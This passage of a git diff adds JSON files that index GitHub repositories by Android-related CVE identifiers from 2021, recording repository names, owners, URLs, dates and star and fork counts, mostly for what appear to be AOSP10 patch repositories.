"2022-04-19T06:12:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0333.json b/2021/CVE-2021-0333.json new file mode 100644 index 0000000000..a752a36542 --- /dev/null +++ b/2021/CVE-2021-0333.json @@ -0,0 +1,33 @@ +[ + { + "id": 480365226, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0333", + "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0333", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0333", + "description": null, + "fork": false, + "created_at": "2022-04-11T12:14:18Z", + "updated_at": "2023-03-27T01:21:17Z", + "pushed_at": "2022-04-11T12:18:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0334.json b/2021/CVE-2021-0334.json new file mode 100644 index 0000000000..0ffa8636e3 --- /dev/null +++ b/2021/CVE-2021-0334.json @@ -0,0 +1,33 @@ +[ + { + "id": 476687472, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0334", + "full_name": "ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0334", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0334", + "description": null, + "fork": false, + "created_at": "2022-04-01T11:10:57Z", + "updated_at": "2022-04-01T11:28:17Z", + "pushed_at": "2022-04-01T12:01:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0336.json b/2021/CVE-2021-0336.json new file mode 100644 index 0000000000..0071f3eb34 --- /dev/null +++ b/2021/CVE-2021-0336.json @@ -0,0 +1,33 @@ +[ + { + "id": 484323372, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0336", + "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2021-0336", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2021-0336", + "description": null, + "fork": false, + "created_at": "2022-04-22T06:36:57Z", + "updated_at": "2023-03-27T01:18:10Z", + "pushed_at": "2022-04-22T06:44:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0337.json b/2021/CVE-2021-0337.json new file mode 100644 index 0000000000..aa247c2902 --- /dev/null +++ b/2021/CVE-2021-0337.json @@ -0,0 +1,33 @@ +[ + { + "id": 484647956, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0337", + "full_name": "ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0337", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0337", + "description": null, + "fork": false, + "created_at": "2022-04-23T04:41:42Z", + "updated_at": "2022-04-23T05:03:49Z", + "pushed_at": "2022-04-23T05:03:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0339.json b/2021/CVE-2021-0339.json new file mode 100644 index 0000000000..d8a15eb9fa --- /dev/null +++ b/2021/CVE-2021-0339.json @@ -0,0 +1,33 @@ +[ + { + "id": 485260390, + "name": "framework_base_AOSP10_r33_CVE-2021-0339", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0339", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0339", + "description": null, + "fork": false, + "created_at": "2022-04-25T07:09:36Z", + "updated_at": "2022-06-04T15:31:40Z", + "pushed_at": "2022-04-25T07:27:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0340.json b/2021/CVE-2021-0340.json new file mode 100644 index 0000000000..a1df6dc208 --- /dev/null +++ b/2021/CVE-2021-0340.json @@ -0,0 +1,64 @@ +[ + { + "id": 483253394, + "name": "packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340", + "full_name": "Satheesh575555\/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340", + "description": null, + "fork": false, + "created_at": "2022-04-19T13:15:49Z", + "updated_at": "2023-10-30T06:48:48Z", + "pushed_at": "2022-04-19T13:21:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484320137, + "name": "packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340", + "full_name": "nanopathi\/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340", + "description": null, + "fork": false, + "created_at": "2022-04-22T06:24:14Z", + "updated_at": "2022-04-22T07:23:26Z", + "pushed_at": "2022-04-22T07:24:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0390.json b/2021/CVE-2021-0390.json new file mode 100644 index 0000000000..871b320f87 --- /dev/null +++ b/2021/CVE-2021-0390.json @@ -0,0 +1,33 @@ +[ + { + "id": 816842838, + "name": "frameworks_opt_net_wifi_CVE-2021-0390", + "full_name": "uthrasri\/frameworks_opt_net_wifi_CVE-2021-0390", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/frameworks_opt_net_wifi_CVE-2021-0390", + "description": null, + "fork": false, + "created_at": "2024-06-18T13:59:29Z", + "updated_at": "2024-06-19T13:21:54Z", + "pushed_at": "2024-06-18T14:14:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0391.json b/2021/CVE-2021-0391.json new file mode 100644 index 0000000000..2f057e3e89 --- /dev/null +++ b/2021/CVE-2021-0391.json @@ -0,0 +1,33 @@ +[ + { + "id": 480301366, + "name": "framework_base_AOSP10_r33_CVE-2021-0391", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0391", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0391", + "description": null, + "fork": false, + "created_at": "2022-04-11T08:57:29Z", + "updated_at": "2022-04-11T09:05:29Z", + "pushed_at": "2022-04-11T09:05:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0392.json b/2021/CVE-2021-0392.json new file mode 100644 index 0000000000..25640e73cb --- /dev/null +++ b/2021/CVE-2021-0392.json @@ -0,0 +1,33 @@ +[ + { + "id": 816643355, + "name": "System_Connectivity_Wificond_CVE-2021-0392", + "full_name": "uthrasri\/System_Connectivity_Wificond_CVE-2021-0392", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/System_Connectivity_Wificond_CVE-2021-0392", + "description": null, + "fork": false, + "created_at": "2024-06-18T06:25:02Z", + "updated_at": "2024-06-18T07:43:08Z", + "pushed_at": "2024-06-18T07:43:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0393.json b/2021/CVE-2021-0393.json new file mode 100644 index 0000000000..4ca9ca968b --- /dev/null +++ b/2021/CVE-2021-0393.json @@ -0,0 +1,33 @@ +[ + { + "id": 486872701, + "name": "external_v8_AOSP10_r33_CVE-2021-0393", + "full_name": "Trinadh465\/external_v8_AOSP10_r33_CVE-2021-0393", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_v8_AOSP10_r33_CVE-2021-0393", + "description": null, + "fork": false, + "created_at": "2022-04-29T07:09:27Z", + "updated_at": "2023-04-17T01:13:04Z", + "pushed_at": "2022-04-29T07:12:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0394.json b/2021/CVE-2021-0394.json new file mode 100644 index 0000000000..dc324c92f1 --- /dev/null +++ b/2021/CVE-2021-0394.json @@ -0,0 +1,64 @@ +[ + { + "id": 486047327, + "name": "packages_apps_Settings_CVE-2021-0394", + "full_name": "nanopathi\/packages_apps_Settings_CVE-2021-0394", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/packages_apps_Settings_CVE-2021-0394", + "description": null, + "fork": false, + "created_at": "2022-04-27T04:40:51Z", + "updated_at": "2022-04-27T04:40:51Z", + "pushed_at": "2022-04-27T04:40:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685410174, + "name": "platform_art_CVE-2021-0394", + "full_name": "Trinadh465\/platform_art_CVE-2021-0394", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_art_CVE-2021-0394", + "description": null, + "fork": false, + "created_at": "2023-08-31T07:00:49Z", + "updated_at": "2023-08-31T07:02:47Z", + "pushed_at": "2023-08-31T07:03:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0396.json b/2021/CVE-2021-0396.json new file mode 100644 index 0000000000..eda72d4b7b --- /dev/null +++ b/2021/CVE-2021-0396.json @@ -0,0 +1,33 @@ +[ + { + "id": 486848599, + "name": "external_v8_AOSP10_r33_CVE-2021-0396", + "full_name": "Satheesh575555\/external_v8_AOSP10_r33_CVE-2021-0396", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_v8_AOSP10_r33_CVE-2021-0396", + "description": null, + "fork": false, + "created_at": "2022-04-29T05:28:48Z", + "updated_at": "2023-04-17T01:15:01Z", + "pushed_at": "2023-02-17T11:14:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0397.json b/2021/CVE-2021-0397.json new file mode 100644 index 0000000000..2021932019 --- /dev/null +++ b/2021/CVE-2021-0397.json @@ -0,0 +1,33 @@ +[ + { + "id": 476561257, + "name": "System_bt_AOSP10-r33_CVE-2021-0397", + "full_name": "Satheesh575555\/System_bt_AOSP10-r33_CVE-2021-0397", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/System_bt_AOSP10-r33_CVE-2021-0397", + "description": null, + "fork": false, + "created_at": "2022-04-01T03:31:38Z", + "updated_at": "2023-08-29T13:42:11Z", + "pushed_at": "2022-04-01T03:35:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0399.json b/2021/CVE-2021-0399.json new file mode 100644 index 0000000000..791a881814 --- /dev/null +++ b/2021/CVE-2021-0399.json @@ -0,0 +1,33 @@ +[ + { + "id": 614249457, + "name": "Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-", + "full_name": "nipund513\/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-", + "owner": { + "login": "nipund513", + "id": 81982865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81982865?v=4", + "html_url": "https:\/\/github.com\/nipund513", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nipund513\/Exploiting-UAF-by-Ret2bpf-in-Android-Kernel-CVE-2021-0399-", + "description": null, + "fork": false, + "created_at": "2023-03-15T07:52:05Z", + "updated_at": "2023-03-15T07:52:05Z", + "pushed_at": "2023-03-15T07:54:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0431.json b/2021/CVE-2021-0431.json new file mode 100644 index 0000000000..8c46b3d81b --- /dev/null +++ b/2021/CVE-2021-0431.json @@ -0,0 +1,64 @@ +[ + { + "id": 483943224, + "name": "system_bt_AOSP10_r33_CVE-2021-0431", + "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0431", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0431", + "description": null, + "fork": false, + "created_at": "2022-04-21T07:05:53Z", + "updated_at": "2022-04-21T07:09:05Z", + "pushed_at": "2022-04-21T07:09:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 483947573, + "name": "system_bt_AOSP10_r33_CVE-2021-0431", + "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0431", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0431", + "description": null, + "fork": false, + "created_at": "2022-04-21T07:20:59Z", + "updated_at": "2022-04-21T07:28:16Z", + "pushed_at": "2022-04-21T07:29:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0433.json b/2021/CVE-2021-0433.json new file mode 100644 index 0000000000..3d1bcfe38b --- /dev/null +++ b/2021/CVE-2021-0433.json @@ -0,0 +1,33 @@ +[ + { + "id": 483637216, + "name": "frameworks_base_AOSP10_r33_CVE-2021-0433", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0433", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2021-0433", + "description": null, + "fork": false, + "created_at": "2022-04-20T12:03:35Z", + "updated_at": "2023-03-27T01:41:33Z", + "pushed_at": "2022-04-20T12:15:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0435.json b/2021/CVE-2021-0435.json new file mode 100644 index 0000000000..d77dbc8cec --- /dev/null +++ b/2021/CVE-2021-0435.json @@ -0,0 +1,64 @@ +[ + { + "id": 483935047, + "name": "system_bt_AOSP10_r33_CVE-2021-0435", + "full_name": "nanopathi\/system_bt_AOSP10_r33_CVE-2021-0435", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/system_bt_AOSP10_r33_CVE-2021-0435", + "description": null, + "fork": false, + "created_at": "2022-04-21T06:37:09Z", + "updated_at": "2022-04-21T06:50:39Z", + "pushed_at": "2022-04-21T06:51:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 483939916, + "name": "system_bt_AOSP10_r33_CVE-2021-0435", + "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0435", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0435", + "description": null, + "fork": false, + "created_at": "2022-04-21T06:54:34Z", + "updated_at": "2022-04-21T06:58:25Z", + "pushed_at": "2022-04-21T06:59:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0437.json b/2021/CVE-2021-0437.json new file mode 100644 index 0000000000..6003ec2c2d --- /dev/null +++ b/2021/CVE-2021-0437.json @@ -0,0 +1,33 @@ +[ + { + "id": 484009104, + "name": "frameworks_av_AOSP10_r33_CVE-2021-0437", + "full_name": "nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0437", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/frameworks_av_AOSP10_r33_CVE-2021-0437", + "description": null, + "fork": false, + "created_at": "2022-04-21T10:37:06Z", + "updated_at": "2022-04-21T10:44:14Z", + "pushed_at": "2022-04-21T10:45:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0466.json b/2021/CVE-2021-0466.json new file mode 100644 index 0000000000..3e566529cd --- /dev/null +++ b/2021/CVE-2021-0466.json @@ -0,0 +1,33 @@ +[ + { + "id": 816750527, + "name": "frameworks_opt_net_wifi_CVE-2021-0466", + "full_name": "uthrasri\/frameworks_opt_net_wifi_CVE-2021-0466", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/frameworks_opt_net_wifi_CVE-2021-0466", + "description": null, + "fork": false, + "created_at": "2024-06-18T10:34:34Z", + "updated_at": "2024-06-19T13:20:29Z", + "pushed_at": "2024-06-18T14:31:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0472.json b/2021/CVE-2021-0472.json new file mode 100644 index 0000000000..c3d1c52e49 --- /dev/null +++ b/2021/CVE-2021-0472.json @@ -0,0 +1,33 @@ +[ + { + "id": 476366397, + "name": "framework_base_AOSP10_r33_CVE-2021-0472", + "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0472", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0472", + "description": null, + "fork": false, + "created_at": "2022-03-31T15:28:01Z", + "updated_at": "2022-04-01T02:30:35Z", + "pushed_at": "2022-03-31T15:38:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0474.json b/2021/CVE-2021-0474.json new file mode 100644 index 0000000000..ee87d2253e --- /dev/null +++ b/2021/CVE-2021-0474.json @@ -0,0 +1,64 @@ +[ + { + "id": 483662110, + "name": "system_bt_A10-r33_CVE-2021-0474", + "full_name": "pazhanivel07\/system_bt_A10-r33_CVE-2021-0474", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/system_bt_A10-r33_CVE-2021-0474", + "description": null, + "fork": false, + "created_at": "2022-04-20T13:17:24Z", + "updated_at": "2023-09-15T19:54:58Z", + "pushed_at": "2022-04-21T06:35:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 483948194, + "name": "system_bt_A10_r33_CVE-2021-0474", + "full_name": "pazhanivel07\/system_bt_A10_r33_CVE-2021-0474", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/system_bt_A10_r33_CVE-2021-0474", + "description": null, + "fork": false, + "created_at": "2022-04-21T07:22:59Z", + "updated_at": "2022-04-21T07:26:18Z", + "pushed_at": "2022-04-21T07:27:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0475.json b/2021/CVE-2021-0475.json new file mode 100644 index 0000000000..3dc0850c0d --- /dev/null +++ b/2021/CVE-2021-0475.json @@ -0,0 +1,33 @@ +[ + { + "id": 483536184, + "name": "system_bt_AOSP10_r33_CVE-2021-0475", + "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0475", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2021-0475", + "description": null, + "fork": false, + "created_at": "2022-04-20T06:36:43Z", + "updated_at": "2022-04-20T06:45:49Z", + "pushed_at": "2022-04-20T06:47:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-0476.json b/2021/CVE-2021-0476.json new file mode 100644 index 0000000000..a81824f6fc --- /dev/null +++ b/2021/CVE-2021-0476.json @@ -0,0 +1,33 @@ +[ + { + "id": 477595432, + "name": "system_bt_AOSP10_r33_CVE-2021-0476", + 